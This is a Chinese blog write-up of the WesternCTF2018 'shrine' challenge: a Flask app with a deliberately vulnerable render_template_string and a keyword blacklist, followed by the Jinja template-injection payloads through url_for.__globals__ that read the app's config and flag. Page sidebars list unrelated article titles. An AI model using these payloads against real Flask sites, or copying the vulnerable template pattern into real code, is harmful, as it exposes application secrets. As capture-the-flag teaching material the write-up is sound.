当前位置:网站首页>[WesternCTF2018]shrine
[WesternCTF2018]shrine
2022-07-29 00:56:00 【pakho_C】
[WesternCTF2018]shrine
flask框架
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{
{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
os.environ.pop(‘FLAG’) 获取环境变量 存放在名为FLAG的config中
那么目的就是获取config中的值
flask框架首先考虑模板注入ssti
测试:
执行函数的黑名单有两个:config和self
不过python还有一些内置函数,比如url_for和get_flashed_messages
使用url_for测试:
shrine/{
{
url_for.__globals__}}
可以执行,查看current_app的配置信息:
shrine/{
{
url_for.__globals__['current_app'].config}}
边栏推荐
- 代码生成器
- 【HCIP】重发布及路由策略的实验
- T-sne dimensionality reduction
- The new generation of public chain attacks the "Impossible Triangle"
- Autoware reports an error: can't generate global path for start solution
- What is the ISO assessment? How to do the waiting insurance scheme
- [hcip] MPLS Foundation
- 云原生应用综合练习上
- 【Web技术】1395- Esbuild Bundler HMR
- ValueError: Colors must be aRGB hex values
猜你喜欢
Read the recent trends of okaleido tiger and tap the value and potential behind it
SiC Power Semiconductor Industry Summit Forum successfully held
golang启动报错【已解决】
【HCIP】重发布及路由策略的实验
规划数学期末考试模拟二
SQL injection of DVWA
Data security is a competitive advantage. How can companies give priority to information security and compliance
J9 number theory: what factors determine the value of NFT?
We summarized the three recommendations for the use of Nacos and first published the Nacos 3.0 plan for the 4th anniversary of the open source of Nacos
承办首届算力大会,济南胜在何处?
随机推荐
Groundwater, soil, geology and environment
New upgrade: get Taobao product details "advanced version" API
代码生成器
承办首届算力大会,济南胜在何处?
Analysis of Multi Chain use cases on moonbeam -- review of Derek's speech in Polkadot decoded 2022
Tomorrow infinite plan, 2022 conceptual planning scheme for a company's yuanuniverse product launch
SiC Power Semiconductor Industry Summit Forum successfully held
[unity project practice] synthetic watermelon
Super scientific and technological data leakage prevention system, control illegal Internet behaviors, and ensure enterprise information security
JS 定时器setInterval clearInterval 延时器setTimeOut 异步 动画
How to deal with the DDoS attack on the game server and how to defend it?
ELS stop at all
The new generation of public chain attacks the "Impossible Triangle"
Use of resttemplate and Eureka
How to protect WordPress website from network attack? It is essential to take safety measures
SQL injection of DVWA
Reinforcement learning (III): dqn, nature dqn, double dqn, with source code interpretation
Docuware mobile labor solution can help you build a new productivity model: anytime, anywhere, any device
Read the recent trends of okaleido tiger and tap the value and potential behind it
【GoLang】网络连接 net.Dial